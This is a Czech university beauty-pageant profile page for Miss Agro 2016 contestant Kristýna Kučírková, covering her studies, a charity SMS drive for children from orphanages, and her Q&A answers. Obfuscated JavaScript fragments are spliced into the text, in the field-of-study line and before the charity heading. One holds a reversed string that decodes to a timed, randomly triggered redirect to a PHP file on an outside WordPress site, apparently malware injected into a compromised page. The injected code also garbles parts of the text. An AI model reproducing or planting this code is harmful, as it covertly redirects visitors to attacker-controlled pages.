Kristýna Kučírková

Profil

Fakulta: Provozně ekonomická fakulta (PEF)
Obor: Economics dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}and Management (EAM)
Věk: 25 let
Ročník: 5.

Kristýna chce dokázat, že blondýny a Missky mohou mít také něco v hlavě, nejenom na hlavě. Stala se členkou Akademického senátu PEF, vystudovala double degree ve Francii, a odvezla si tak titul MSc. Teď už jí ke štěstí stačí pouze titul Miss Agro. Miluje cestování, dobrodružství, jízdu na koni, šachy a domácí kačenu s knedlíkama. Slovo závěrem? Miss bere se šprýmem, proto zakončí to rýmem – Elegantní, prostě šik, tohle není kysličník, je světová výjimka, krásná chytrá blondýnka!

“Podporujeme

)=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}domovů“ h4=“Pošlete DMS a zařaďte se do slosování o ceny“ css=“.vc_custom_1516548733563{margin-top: 30px !important;}“]Miss Agro podporuje mladé studenty z dětských domovů prostřednictvím organizace Nadání a dovednosti o.p.s. Podpořte je i Vy! Pošlete dárcovskou SMS ve tvaru DMS ROZHLED na číslo 87 777. Cena DMS je 30 Kč. Více na www.darcovskasms.cz. Zasláním DMS do 10. 5. 2016 můžete navíc za Vaši podporu získat odměnu.

Proč by ses zrovna Ty měla stát Miss Agro 2016?
Jak je řečeno v konceptu soutěže, Miss Agro není pouze obyčejnou soutěží krásy, ale kombinuje v sobě inteligenci, šarm a eleganci. A já doufám, že bych mohla být reprezentativní Miss Agro 2016 tohoto nového konceptu. V rámci studií na ČZU si nejvíce cením, že jsem měla možnost stát se členkou Akademického senátu PEF v letech 2012-2014, vycestovala na jednoletý studijní program Erasmus do Německa a teď v lednu zakončila studium double degree programu na Grenoble Ecole de Management ve Francii. Co se týče druhé části soutěže Miss Agro, tedy aktivit spojených s modelingem, od 15 let byla mojí mateřskou agenturou Czechoslovak Models, díky které jsem dostala příležitost vycestovat do Milána a tahle zahraniční zkušenost se doteď řadí mezi jednu z nejkrásnějších v mém životě. Miss Agro 2016 navíc tento rok nově spolupracuje se společností Nadání a dovednosti o.p.s. a pomáhá dětem z dětských domovů, které neměly tolik štěstí v životě. Což byl také jeden z motivátorů, proč jsem se po 5 letech odhodlala nebýt pouze divák s pivem v ruce, ale skutečně se do soutěže přihlásit. Já sice nepocházím z dětského domova, ale trpím chronickým onemocněním, které by mohlo být v určitých směrech limitující, ale zatím to pro mě nebylo překážkou dosáhnout svých cílů, pokud se nedáte a bojujete. A já bych ráda tuhle motivaci a entuziasmus předávala dětem dál a motivovala je, že všechno je možné. Je jen potřeba chtít, pracovat na tom a jakákoli překážka se dá překonat. Vždyť se přeci říká, že překážky jsou jen dveře k naplnění našich snů. Abych to shrnula, pár dní po finále Miss Agro budu slavit narozeniny, takže získání titulu Miss Agro by byla doslova třešnička na narozeninovém dortu a zároveň ten nejlepší start do nadcházejících státnic.

Kdyby ses mohla narodit ještě jednou, kdo bys byla?
Grace Kelly, protože ji obdivuji a chtěla bych vidět, jak vypadal život z její perspektivy oproti tomu, co se píše. Ona sama jednou prohlásila: „The idea of my life as a fairy tale is itself a fairy tale.“

Na který předmět na ČZU vzpomínáš nejvíce a proč?
Na Biologické základy chovu zvířat v prváku. Myslím, že tenhle předmět se už na PEF nevyučuje, pro někoho úleva, podle mě škoda. Ten předmět patřil mezi klasiku už jen tím, že jsme se o hodinách píchali do prstu a zjišťovali krevní skupiny. Navíc cvičení byla od 7 od rána během zimního semestru a byla povinná, což znamenalo vyjet v 6 ráno a vstávat kolem 5:30. Pro spáče jako já to bylo utrpení a i díky tomu si na tenhle předmět tak dobře vzpomínám.